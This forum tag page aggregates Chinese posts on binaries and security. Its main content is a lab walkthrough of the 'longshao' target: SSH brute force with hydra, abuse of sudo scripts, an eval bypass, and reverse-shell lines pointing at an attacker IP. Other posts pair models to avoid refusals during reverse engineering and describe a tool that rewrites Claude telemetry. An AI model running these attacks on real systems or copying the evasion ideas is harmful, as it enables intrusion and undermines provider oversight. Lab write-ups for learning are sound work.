/tag/二进制

本人之前从事二进制方向，PWN和逆向的研究，从一个月前开始SRC的研究。正好赶上了这波AI挖掘SRC的浪潮，各路培训机构层出不穷，本人也在可以算是第一家有成熟套路的机构报了名，上了几天课，但是一直有几个无法解决的问题，在此分享一些目前的一些收获和测试情况（后面我会附上我想到的问题，有些问题没有实践只是猜想）以及向各位佬友交流一下有没有更好的解决方案。 各类堆skill大法 在这个方法下又诞生了几种方法论： 把SRC报告喂给ai，让ai总结成skill 问题：src报告通常都是复现过程，缺少了漏洞发现的过程，以及一些排查思路。 让ai打靶场，总结成skill 问题：实测dp无法很好地写这个skill，打到有价值的地方也不进行总结，gpt5.5稍微好一点，但是效果也不尽人意 蒸馏各类网安skill 问题：显而易见，听说这种skill很难出货，因为信息杂乱，通常是由ai总结，依然脱离实战 另外，实测发现随着上下文变长,AI会慢慢不听skill的话 记忆系统 这种方法我觉得不仅适用于网安，也适用其他领域。 就是将上下文、技巧、经验不仅存储在skill里，也存储在数据库中 问题：ai不知道什么时候把当前的重复错误行为和有价值的经验存入数据库，也不知道什么时候从数据库中提取什么经验。且选型我目前很纠结，这个东西类似本地知识库，但是用RAG又很臃肿，用jsonl又过于轻量且只能用关键词一比一搜索，不能模糊搜索，那还有什么意义呢，比如xss一搜，可能出来很多很多，即便解决了这个问题，也面临ai不会用的问题。 我想到的解决办法： 针对记忆系统，使用传统skill的方式去写，但是由人工审核干预，还是很累做不到自动化，比如看到AI重复犯错，就触发写记忆skill，写到对应领域的技巧的skill里 轻量skill，skill只做角色定位+写记忆skill+记忆 实测还是有问题 ，不约束流程，ai会漏掉很多接口，功能点，还是不听skill的话，上下文问题还是无法解决。以下是测试情况，测试目标是我徒弟测试过的一个edu站点。 第一版重流程skill（从国外大佬提取+打靶场强制他优化）无记忆系统： deepseek v4 pro可以挖到edu站点中手挖几小时出来的同样的身份证信息泄露，又多挖出来四个csrf 第二版加记忆系统，轻skill： dp直接蒙圈，困在主站页面，浪费大量token后没有任何发现（开始不用mcp工具一直用curl） gpt5.5竟然更严重，从头到尾不调用mcp工具 第三版最轻量skill： gpt5.5同样的问题，并且会胆子很小，各种功能点全部避开，甚至js都不看 目前也是徘徊，我觉得记忆系统有必要，但是不知道怎样落地，ai挖洞的意义难道不是覆盖手工无法覆盖的地方，提高手工的效率吗，如果他学不会手工的技巧，漏掉功能点，哪还有什么意义呢，初入此站，望各位佬友能一起交流，寻找灵感。 5 个帖子 - 2 位参与者 阅读完整话题

日前，老马同志在xAI全员大会指出，到2026年底，人类可能不再需要手写代码，AI将直接生成二进制程序。老马同志表示说，xAI正在研发一款名为Grok Code的编程模型，目标是让AI直接与计算机硬件对话，绕过代码编译环节，从而提高效率，直接生成的机器代码。老马同志强调，这并不是要淘汰码农，而是让重复性、低技术含量的编码工作将由AI接管，而码农将转向更高阶的工作。 佬们，古法编程，手搓代码时代是不是要结束了？ 8 个帖子 - 8 位参与者 阅读完整话题

[求助] 有什么工作流程让MiMo控制gpt-5.5去进行逆向？ 思路： MiMo负责二进制逆向框架和路线把握； 由MiMo调用gpt-5.5进行具体二进制内容分析，把分析结果反馈给MiMo推进，二者协商去修改二进制； 优点： MiMo很少对逆向直接拒绝，gpt-5.5具体分析时又快有准，二者配合效果会比较好。 需求： 有什么工具框架，或者方法/工具能实现这个思路？ 1 个帖子 - 1 位参与者 阅读完整话题

靶机来自 MazeSec（迷踪安全）： MazeSec | About 靶机名：longshao 系统 ：Linux 作者 ：超级黑暗无敌龙 难度 ：Easy 依旧新鲜靶机，文章其实早就写好了，但是由于还在群内的做题时间，所以现在才发出来，欢迎大家学习和指导 不多说，直接开始。 信息收集 靶机ip： 192.168.56.108 端口扫描 ┌──(kali㉿JYlover)-[~] └─$ nmap -p- 192.168.56.108 开放 22 、 80 端口，这次就很明显是从web入手了。 一个登录页面。 测了一下没有类似sql注入的问题。 那就扫一下目录。常规信息收集： $ dirsearch -u 192.168.56.108 多出来一个 /dashboard.php （ /cgi-bin/printenv和/cgi-bin/test-cgi这两个应该是apache自带的一些配置文件，没有什么用） 我们去访问dashboard: 直接给了ssh凭证，web端是白给的，所以我说侧重是在shell提权上。 baolong:jinhua 横向移动 $ ssh [email protected] # 输入：jinghua 登录到 baolong 用户。 然后我们信息收集一波。 baolong@longshao:~$ sudo -l # Sorry, user baolong may not run sudo on longshao. baolong@longshao:~$ wget 192.168.56.1:9999/pspy64 baolong@longshao:~$ chmod +x pspy64 baolong@longshao:~$ ./pspy64 没有啥大收获。 这里又传了 linpeas.sh （工具箱中的）上去扫了一遍。 这是一个bash脚本，用于在 Linux 系统上自动进行信息收集和提权路径枚举。 baolong@longshao:~$ wget 192.168.56.1:9999/linpeas.sh Connecting to 192.168.56.1:9999 (192.168.56.1:9999) saving to 'linpeas.sh' linpeas.sh 100% |******************************************************************| 1032k 0:00:00 ETA 'linpeas.sh' saved baolong@longshao:~$ chmod +x linpeas.sh baolong@longshao:~$ ./linpeas.sh -bash: ./linpeas.sh: /bin/sh^M: bad interpreter: No such file or directory baolong@longshao:~$ sed -i 's/\r$//' linpeas.sh baolong@longshao:~$ ./linpeas.sh 注意这里如果是从windows上传过去可能会有这个换行符冲突的问题，我们可以用sed命令替换一下。 然后他就会开始自动扫。 也并没有扫到什么很有用的东西，但是也顺带有点收获： 可以看到有3个普通用户: baolong chaojibaolong chaojiwudilong 可能是打横移链。（这名字起的，暴龙的进化之旅(～￣▽￣)～） 又注意到/opt目录下有一个 internal 目录。（opt目录放第三方下载的东西，所以很多作者会把口子放在这里） 既然没啥东西了，那我们肯定就去看看这个 internal 目录吧 baolong@longshao:~$ ls /opt/internal -la 看到有一个 parser_core 的二进制文件，root所有，属于 chaojibaolong 组，且组用户可执行。 很明显是引导我们横移到 chaojibaolong 用户了。 我们想把文件拉下来分析一下， 但是也需要有 chaojibaolong 用户，其中我们也没发现其他横移的路子。 没办法的时候就想想最笨的办法，直接去爆破一下ssh密码呢？ ┌──(kali㉿JYlover)-[~] └─$ hydra -l chaojibaolong -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.108 -t 4 -e nsr 还真给扫到了。 chaojibaolong/love123 可以拷贝下来了： $ scp [email protected]:/opt/internal/parser_core ~/tmp/ 这是在我们攻击机上执行的远程拷贝命令 然后用ida打开看看。 直接f5反汇编 好像大概就是有一个 --debug 参数，…然后就可以执行 su chaojiwudilong 啦≡(▔﹏▔)≡。好吧看不懂。 交给ai： 必须root执行 必须是 1 或 2 个参数（ argc - 2 <= 1 ）。 1 个参数：正常模式 2 个参数：若第二个参数为 --debug ，开启调试标志（这里argc[0]是程序本身，所以{ a2[2], "--debug" }不是检查第三个参数而是第二个） 文件名必须 .log 结尾，文件必须在 /tmp/ 下 log文件存在的话就只是打印成功，不存在的时候且开启了调式模式，就会执行 su chaojiwudilong 那么很清晰，我们的目标是： 以root身份执行这个程序–>启动调试模式–>指定一个不存在的log文件 也就是 $ /opt/internal/parser_core /tmp/1.log --debug 如果root执行了这个命令，就可以切换身份了 但是我们怎么去root执行呢？可能到这里就没什么思路了。 那就登录。在信息收集一下sudo权限有没有。 baolong@longshao:~$ su chaojibaolong # 输入：love123 chaojibaolong@longshao:/home/baolong$ sudo -l 直接发现拥有 无需密码执行 /usr/local/bin/check_parser 的权限。 这是个什么东西呢，我们去看看。 chaojibaolong@longshao:/home/baolong$ vi /usr/local/bin/check_parser 是一个bash脚本大概是： 检查uid是否为0，也就是检查是不是root执行。不是root直接退出 检查第一个参数，如果第一个参数为空且第一个参数对应的路径 不是 普通文件，则退出。这里用的并运算（-a），所以如果有参数的话，就一定不会退出 执行 parser_core ，并且把参数传递给它 又清晰了，上面我们分析过，只需要执行 parser_core 并带有 --debug 参数就可以到 chaojiwudilong $ /opt/internal/parser_core /tmp/1.log --debug 我们不能root执行 parser 但是可以root执行 check_parser 呀，而 check_parser 又执行了 parser 。这样就间接执行了，而且参数原样传递，我们可以像直接调用 parser 一样，就是改一下名字。 我们执行： $ sudo /usr/local/bin/check_parser /tmp/1.log --debug 横向完成。 提权 拿到最后一个普通用户，再看看sudo权限： $ sudo -l 可以无密码执行 /usr/local/bin/a.sh 去看看这个脚本。 chaojiwudilong@longshao:~$ cat /usr/local/bin/a.sh 终于能看懂了: 先把PATH直接改成 /usr/bin （这样所有命令会去 /usr/bin 下面找） cd到 /tmp 目录 <( ... ) 表示把命令执行的结果当一个临时文件，然后把临时文件的值赋值给 $CMD head -n1 | tr -d "[A-Za-z0-9/]" 表示取出第一行，删掉其中的数字字母和 最后执行 $CMD 也就是这个脚本的参数，不能有数字字母和 / ，然后这个参数会被执行。 这里就是一个无数字字母命令执行。 虽然没有数字没有字母，但是还有 ! 、 ? 、 _ 这些特殊符号呀。 这里首先我们要知道一个知识点，那就是 . <文件名> （注意有空格）是可以执行shell脚本的（ . 是 source 命令的简写，用于在当前 shell 进程中执行脚本），例如： 这里看得很清楚， source <文件名> 可以成功执行 a 文件中的shell命令， . <文件名> 也可以 所以我们流程就是： 创建名为 _ 的文件，内容是shell命令—>sudo执行 a.sh ，—>传入 . _ 然后就打成任意命令执行了。 1. 2. 关于最后提权的小复盘 我们要注意到脚本中： PATH=/usr/bin cd /tmp read CMD < <(head -n1 | tr -d "[A-Za-z0-9/]") eval "$CMD" 有一句改PATH的命令，所以有些命令我们最好用绝对路径，不然会默认去 /usr/bin 里面找 例如我们的反弹shell。 bash -c 'exec bash -i &>/dev/tcp/192.168.56.1/8888 <&1' # 就要改成 /bin/bash -c 'exec /bin/bash -i &>/dev/tcp/192.168.56.1/8888 <&1' 不然就会报错 因为 /usr/bin 下面没有 bash ，他是在 /bin/bash 这里还发现： echo "/bin/bash -i >& /dev/tcp/192.168.56.1/8888 0>&1">_ # 这个不行 会报错 这里不知道是为什么，可能是执行是的环境是 sh ？ 这里实在搞不懂了 还有一点就是如果不用 _ ，用 ? 或者 ! 也是可以的，但是由于他们在shell中有特殊含义，所以要注意利用“”。 知识点总结 本次靶机遇到的知识点： 遇到二进制文件可以拉下来反编译审计 source <文件名>是把文件名执行。可以写成 . 文件名 ，绕过限制 这次靶机遇到的固定知识点比较少，大部分是根据实际情况来的分析，代码审计。大家可以自行复现 2 个帖子 - 2 位参与者 阅读完整话题

大家好， 我独立开发了一个用 Rust 写的后端即服务（ BaaS ）和 Headless CMS ，叫 RaisFast ，目前已经可以跑通完整流程，想找一些早期用户和共建者。 它是什么 一句话： 单二进制文件，下载即运行，自带博客、电商、钱包、支付、多租户 SaaS 。不需要 Node.js ，不需要 Docker ，不需要任何运行时依赖。 核心数据： 语言：Rust （ edition 2024 ） HTTP 框架：Axum 0.8 数据库：SQLite / PostgreSQL / MySQL ，零代码切换（ feature flag ） 搜索：内建 Tantivy 全文检索 Admin UI：React 19 + shadcn/ui ，嵌入二进制，无需单独部署 桌面端：Tauri 封装（已有） 插件引擎：JS (QuickJS) / Rhai / Lua (mlua) / WASM (wasmtime) 四引擎 已有能力 模块 状态 Blog / CMS （文章、页面、分类、标签、评论、媒体、RSS 、Sitemap ） ✅ 电商（购物车、订单、商品变体、优惠券） ✅ 钱包 & 支付（多币种钱包，支付宝/微信/Stripe/Dodo/Creem ） ✅ OAuth 社交登录（ GitHub 、Google 等） ✅ 动态 Content Type （ TOML 定义 Schema ，自动生成 CRUD API ） ✅ JWT + Refresh Token + API Token + RBAC 权限 ✅ 多租户隔离 ✅ Job Queue + Cron 调度 + AOP + Event Bus ✅ 插件系统（ 4 引擎） ✅ 全文搜索 ✅ 怎么跑起来 参考安装文档： https://www.raisfast.com/install 现有模板 目前有 4 个前端模板可以开箱即用： blog-foundry — 博客模板 blog-kanso — 博客模板（日式极简风） blog-volt — 博客模板（暗色系） ecommerce-forge — 电商模板（ Next.js ，多语言 en/zh ） 都自带 SEO （ OG/Twitter Card 、JSON-LD 、Sitemap 、RSS Feed ）和 LLM 优化（ llms.txt ）。 我在找什么人 项目目标是 2026 Q3 发 v1.0 ，现在需要各种背景的朋友参与： 后端开发者 内核开发 — Rust 选手，目前还有很多模块可以深入（支付网关、搜索优化、Serverless 适配等） 插件开发 — 不一定要会 Rust 。用 JS / Lua / Rhai 写插件，扩展 CMS 能力。插件系统已完整，需要更多真实场景的插件来验证 API 设计 前端开发者 模板开发 — 用 Next.js / Astro / Nuxt 等任意框架，对接 RaisFast 的 REST API ，做你喜欢的模板。现有 4 个模板可以作为参考 Admin UI 改进 — React + shadcn/ui ，还有很多页面和交互可以完善 普通用户 试用反馈 — 跑起来，用一用，告诉我哪里难用、哪里有 bug 、缺什么功能 文档贡献 — 英文/中文文档都缺人写 Content Type 创作 — 用 TOML 定义数据模型，不需要写代码就能创建新的内容类型 项目地址 GitHub: https://github.com/RaisFast/raisfast 官网: https://raisfast.com 欢迎 star 、提 issue 、提 PR ，或者加群交流。有任何问题都可以在 issue 里问，我会尽快回复。 感谢阅读！ VX： 一五二 10615644 QQ：⑦⑤②39222

大家好， 我独立开发了一个用 Rust 写的后端即服务（ BaaS ）和 Headless CMS ，叫 RaisFast ，目前已经可以跑通完整流程，想找一些早期用户和共建者。 它是什么 一句话： 单二进制文件，下载即运行，自带博客、电商、钱包、支付、多租户 SaaS 。不需要 Node.js ，不需要 Docker ，不需要任何运行时依赖。 核心数据： 语言：Rust （ edition 2024 ） HTTP 框架：Axum 0.8 数据库：SQLite / PostgreSQL / MySQL ，零代码切换（ feature flag ） 搜索：内建 Tantivy 全文检索 Admin UI：React 19 + shadcn/ui ，嵌入二进制，无需单独部署 桌面端：Tauri 封装（已有） 插件引擎：JS (QuickJS) / Rhai / Lua (mlua) / WASM (wasmtime) 四引擎 已有能力 模块 状态 Blog / CMS （文章、页面、分类、标签、评论、媒体、RSS 、Sitemap ） ✅ 电商（购物车、订单、商品变体、优惠券） ✅ 钱包 & 支付（多币种钱包，支付宝/微信/Stripe/Dodo/Creem ） ✅ OAuth 社交登录（ GitHub 、Google 等） ✅ 动态 Content Type （ TOML 定义 Schema ，自动生成 CRUD API ） ✅ JWT + Refresh Token + API Token + RBAC 权限 ✅ 多租户隔离 ✅ Job Queue + Cron 调度 + AOP + Event Bus ✅ 插件系统（ 4 引擎） ✅ 全文搜索 ✅ 怎么跑起来 参考安装文档： https://www.raisfast.com/install 现有模板 目前有 4 个前端模板可以开箱即用： blog-foundry — 博客模板 blog-kanso — 博客模板（日式极简风） blog-volt — 博客模板（暗色系） ecommerce-forge — 电商模板（ Next.js ，多语言 en/zh ） 都自带 SEO （ OG/Twitter Card 、JSON-LD 、Sitemap 、RSS Feed ）和 LLM 优化（ llms.txt ）。 我在找什么人 项目目标是 2026 Q3 发 v1.0 ，现在需要各种背景的朋友参与： 后端开发者 内核开发 — Rust 选手，目前还有很多模块可以深入（支付网关、搜索优化、Serverless 适配等） 插件开发 — 不一定要会 Rust 。用 JS / Lua / Rhai 写插件，扩展 CMS 能力。插件系统已完整，需要更多真实场景的插件来验证 API 设计 前端开发者 模板开发 — 用 Next.js / Astro / Nuxt 等任意框架，对接 RaisFast 的 REST API ，做你喜欢的模板。现有 4 个模板可以作为参考 Admin UI 改进 — React + shadcn/ui ，还有很多页面和交互可以完善 普通用户 试用反馈 — 跑起来，用一用，告诉我哪里难用、哪里有 bug 、缺什么功能 文档贡献 — 英文/中文文档都缺人写 Content Type 创作 — 用 TOML 定义数据模型，不需要写代码就能创建新的内容类型 项目地址 GitHub: https://github.com/RaisFast/raisfast 官网: https://raisfast.com 欢迎 star 、提 issue 、提 PR ，或者加群交流。有任何问题都可以在 issue 里问，我会尽快回复。 感谢阅读！ VX： 一五二 10615644 QQ：⑦⑤②39222

大家好， 我独立开发了一个用 Rust 写的后端即服务（ BaaS ）和 Headless CMS ，叫 RaisFast ，目前已经可以跑通完整流程，想找一些早期用户和共建者。 它是什么 一句话： 单二进制文件，下载即运行，自带博客、电商、钱包、支付、多租户 SaaS 。不需要 Node.js ，不需要 Docker ，不需要任何运行时依赖。 核心数据： 语言：Rust （ edition 2024 ） HTTP 框架：Axum 0.8 数据库：SQLite / PostgreSQL / MySQL ，零代码切换（ feature flag ） 搜索：内建 Tantivy 全文检索 Admin UI：React 19 + shadcn/ui ，嵌入二进制，无需单独部署 桌面端：Tauri 封装（已有） 插件引擎：JS (QuickJS) / Rhai / Lua (mlua) / WASM (wasmtime) 四引擎 已有能力 模块 状态 Blog / CMS （文章、页面、分类、标签、评论、媒体、RSS 、Sitemap ） ✅ 电商（购物车、订单、商品变体、优惠券） ✅ 钱包 & 支付（多币种钱包，支付宝/微信/Stripe/Dodo/Creem ） ✅ OAuth 社交登录（ GitHub 、Google 等） ✅ 动态 Content Type （ TOML 定义 Schema ，自动生成 CRUD API ） ✅ JWT + Refresh Token + API Token + RBAC 权限 ✅ 多租户隔离 ✅ Job Queue + Cron 调度 + AOP + Event Bus ✅ 插件系统（ 4 引擎） ✅ 全文搜索 ✅ 怎么跑起来 参考安装文档： https://www.raisfast.com/install 现有模板 目前有 4 个前端模板可以开箱即用： blog-foundry — 博客模板 blog-kanso — 博客模板（日式极简风） blog-volt — 博客模板（暗色系） ecommerce-forge — 电商模板（ Next.js ，多语言 en/zh ） 都自带 SEO （ OG/Twitter Card 、JSON-LD 、Sitemap 、RSS Feed ）和 LLM 优化（ llms.txt ）。 我在找什么人 项目目标是 2026 Q3 发 v1.0 ，现在需要各种背景的朋友参与： 后端开发者 内核开发 — Rust 选手，目前还有很多模块可以深入（支付网关、搜索优化、Serverless 适配等） 插件开发 — 不一定要会 Rust 。用 JS / Lua / Rhai 写插件，扩展 CMS 能力。插件系统已完整，需要更多真实场景的插件来验证 API 设计 前端开发者 模板开发 — 用 Next.js / Astro / Nuxt 等任意框架，对接 RaisFast 的 REST API ，做你喜欢的模板。现有 4 个模板可以作为参考 Admin UI 改进 — React + shadcn/ui ，还有很多页面和交互可以完善 普通用户 试用反馈 — 跑起来，用一用，告诉我哪里难用、哪里有 bug 、缺什么功能 文档贡献 — 英文/中文文档都缺人写 Content Type 创作 — 用 TOML 定义数据模型，不需要写代码就能创建新的内容类型 项目地址 GitHub: https://github.com/RaisFast/raisfast 官网: https://raisfast.com 欢迎 star 、提 issue 、提 PR ，或者加群交流。有任何问题都可以在 issue 里问，我会尽快回复。 感谢阅读！ VX： 一五二 10615644 QQ：⑦⑤②39222

大家好， 我独立开发了一个用 Rust 写的后端即服务（ BaaS ）和 Headless CMS ，叫 RaisFast ，目前已经可以跑通完整流程，想找一些早期用户和共建者。 它是什么 一句话： 单二进制文件，下载即运行，自带博客、电商、钱包、支付、多租户 SaaS 。不需要 Node.js ，不需要 Docker ，不需要任何运行时依赖。 核心数据： 语言：Rust （ edition 2024 ） HTTP 框架：Axum 0.8 数据库：SQLite / PostgreSQL / MySQL ，零代码切换（ feature flag ） 搜索：内建 Tantivy 全文检索 Admin UI：React 19 + shadcn/ui ，嵌入二进制，无需单独部署 桌面端：Tauri 封装（已有） 插件引擎：JS (QuickJS) / Rhai / Lua (mlua) / WASM (wasmtime) 四引擎 已有能力 模块 状态 Blog / CMS （文章、页面、分类、标签、评论、媒体、RSS 、Sitemap ） ✅ 电商（购物车、订单、商品变体、优惠券） ✅ 钱包 & 支付（多币种钱包，支付宝/微信/Stripe/Dodo/Creem ） ✅ OAuth 社交登录（ GitHub 、Google 等） ✅ 动态 Content Type （ TOML 定义 Schema ，自动生成 CRUD API ） ✅ JWT + Refresh Token + API Token + RBAC 权限 ✅ 多租户隔离 ✅ Job Queue + Cron 调度 + AOP + Event Bus ✅ 插件系统（ 4 引擎） ✅ 全文搜索 ✅ 怎么跑起来 参考安装文档： https://www.raisfast.com/install 现有模板 目前有 4 个前端模板可以开箱即用： blog-foundry — 博客模板 blog-kanso — 博客模板（日式极简风） blog-volt — 博客模板（暗色系） ecommerce-forge — 电商模板（ Next.js ，多语言 en/zh ） 都自带 SEO （ OG/Twitter Card 、JSON-LD 、Sitemap 、RSS Feed ）和 LLM 优化（ llms.txt ）。 我在找什么人 项目目标是 2026 Q3 发 v1.0 ，现在需要各种背景的朋友参与： 后端开发者 内核开发 — Rust 选手，目前还有很多模块可以深入（支付网关、搜索优化、Serverless 适配等） 插件开发 — 不一定要会 Rust 。用 JS / Lua / Rhai 写插件，扩展 CMS 能力。插件系统已完整，需要更多真实场景的插件来验证 API 设计 前端开发者 模板开发 — 用 Next.js / Astro / Nuxt 等任意框架，对接 RaisFast 的 REST API ，做你喜欢的模板。现有 4 个模板可以作为参考 Admin UI 改进 — React + shadcn/ui ，还有很多页面和交互可以完善 普通用户 试用反馈 — 跑起来，用一用，告诉我哪里难用、哪里有 bug 、缺什么功能 文档贡献 — 英文/中文文档都缺人写 Content Type 创作 — 用 TOML 定义数据模型，不需要写代码就能创建新的内容类型 项目地址 GitHub: https://github.com/RaisFast/raisfast 官网: https://raisfast.com 欢迎 star 、提 issue 、提 PR ，或者加群交流。有任何问题都可以在 issue 里问，我会尽快回复。 感谢阅读！ VX： 一五二 10615644 QQ：⑦⑤②39222

力扣 LeetCode 1871. 跳跃游戏 VII - 力扣（LeetCode） 1871. 跳跃游戏 VII - 给你一个下标从 0 开始的二进制字符串 s 和两个整数 minJump 和 maxJump 。一开始，你在下标 0 处，且该位置的值一定为 '0' 。当同时满足如下条件时，你可以从下标 i 移动到下标 j 处： * i + minJump <= j <= min(i + maxJump, s.length - 1) 且 * s[j] == '0'. 如果你可以到达 s 的下标 s.length -... 思路 首先题目明显的无后效性，可以用动态规划作答。 容易想到遍历一遍，从 [minJump..maxJump] 进行递推，但是看数据量 1 <= minJump <= maxJump < s.length <= 10^5 大概率会超时。线段树似乎可以，但是太重了。 逆向思考下，如果能够到达 x 点，那么在 [x-maxJump..x-minJump] 至少有一个点可以到达。这点借助前缀和可以在 O(1) 的复杂度内解决，那动态规划的方程式就由 O(n^2) 降到了 O(n) 。 代码 class Solution { public boolean canReach(String s, int minJump, int maxJump) { int n = s.length(); // 是否可以跳到坐标 boolean[] dp = new boolean[n]; dp[0] = true; // 到当前坐标为止能够到达的坐标数量 int[] prefix = new int[n]; // 本来prefix[0]应该设为1，但是这样需要把[0..minJump)都设为1，所以在不影响计算的情况下此处保持0 // prefix[0]= 1; // 初始化边界，[minJump..maxJump]只要为0均可到达 for (int i = minJump; i <= maxJump; i++) { prefix[i] = prefix[i - 1]; if (s.charAt(i) == '0') { dp[i] = true; prefix[i] += 1; } } // 只要前面 [i-maxJump..i-minJump] 范围内有点能够到达此处就能到达 for (int i = maxJump + 1; i < n; i++) { prefix[i] = prefix[i - 1]; if (s.charAt(i) == '0' && prefix[i - minJump] - prefix[i - maxJump - 1] > 0) { dp[i] = true; prefix[i] += 1; } } return dp[n - 1]; } } 1 个帖子 - 1 位参与者 阅读完整话题

handsets —— 用 Rust 写的 Android 高性能自动化 CLI 。 设计 客户端 Rust 单二进制 daemon 是一个 ~几百 KB 的 jar ，通过 adb forward 跑在设备 shell UID 下，无需 root 也无需装 APK 通信走长度前缀的二进制帧 性能 handsets adb shell uiautomator2 Appium 单次调用延迟 2-7ms 40-700ms 30-100ms 100-500ms adb shell input tap 之所以慢且不稳定，是因为它走 injectInputEvent(ev, sync=true) ，sync 模式会阻塞到 InputDispatcher 处理完事件 —— 当 UI 线程在做动画或 layout 的时候，sync 排在队尾等。实测最长 tap 尖峰 2.3 秒。 handsets 默认走 AccessibilityNodeInfo.ACTION_CLICK ，绕开 InputDispatcher ，直接触发 widget 的 OnClickListener ，p99 ~50ms 。OnTouchListener-only 的自定义 View 会 fallback 到 gesture path 。 hs ui 的输出格式 不是 XML accessibility dump ，而是 verb-led 表格： tap ImageButton "返回" #back_btn 98,243 fill EditText "邮箱" #email_et 540,540 fill EditText "密码" #pwd_et 540,640 [password] tap Button "登录" #login_btn 540,860 每行给出建议动词、selector 、坐标、flag 。LLM agent 直接读这张表就能下一步，token 占用比 XML 少一个数量级。 登录流程示例 hs use # 连设备、起 daemon hs ui # 看一眼当前屏幕 hs fill 邮箱 [email protected] # 自动匹配邮箱 EditText hs fill 密码 hunter2 hs tap 登录 # 走 ACTION_CLICK hs wait 欢迎 # 阻塞至目标文本出现 Python 绑定（ pip install handsets ）： from handsets import Session with Session.use() as s: s.fill("邮箱", "[email protected]") s.fill("密码", "hunter2") s.tap("登录") s.wait("欢迎") selector 兼容 CSS + Playwright 风格： hs find 'Button:has-text("Sign in")' hs find 'EditText:below(TextView[text=Email])' hs find 'Button:near(ImageView, 200)' 链接 GitHub: https://github.com/elliotgao2/handsets 文档: https://elliotgao2.github.io/handsets/

本帖使用社区开源推广，符合推广要求。我申明并遵循社区要求的以下内容： 我的帖子已经打上 开源推广 标签： 是 我的开源项目完整开源，无未开源部分： 是 我的开源项目已链接认可 LINUX DO 社区： 是 我帖子内的项目介绍，AI生成、润色内容部分已截图发出： 是 以上选择我承诺是永久有效的，接受社区和佬友监督： 是 以下为项目介绍正文内容，AI生成、润色内容已使用截图方式发出 刚开始只是想做一个方便切换claude code的环境管理器。后面刚好遇到claude code的源码泄露。又再此基础上加了一些功能，包含遥测处理、时区处理等等。 lsy1770/Claude-Isolatot: 面向 Windows 的 Claude 多环境隔离界面，用于管理二进制、配置目录、遥测策略与远程控制。 主要功能： 创建和管理多个隔离环境，每个环境使用独立配置。 处理遥测上报的一些数据，时区改写处理 环境变量管理和配置 提供会话管理、运行日志、拦截日志和二进制校验等。 环境管理和会话启动 遥测和认证等相关处理 会话监控 日志 注：目前缺少样本，A/封号本来就是玄学，我自己的账号用了17天，后面因为放反代上被封了，目前无法区分封号因素，佬友们可自行测试。 个人兴趣爱好开发，望佬友们轻喷！！ 1 个帖子 - 1 位参与者 阅读完整话题

最近偶然用AI开发的时候发现AI可以识别编译文件的二进制符号。那是不是可以用AI做一些闭源库的逆向工程？有没有大佬分析下靠谱吗？ 4 个帖子 - 4 位参与者 阅读完整话题

因为工作和生活中经常遇到对word文档的修改，但是修改完后，东一个西一个，不知道哪个才是我最后修改的， 也不知道变更历史 4 个帖子 - 4 位参与者 阅读完整话题

最近做了一个 PBKDF2 加密文件的小工具，加密成二进制文件，采用许可证形式解密。可设置有效期，防盗溯源水印。 等我优化好些过几天发布开源一下。。大家期待一下哈哈哈哈。晚安，佬友们～ 1 个帖子 - 1 位参与者 阅读完整话题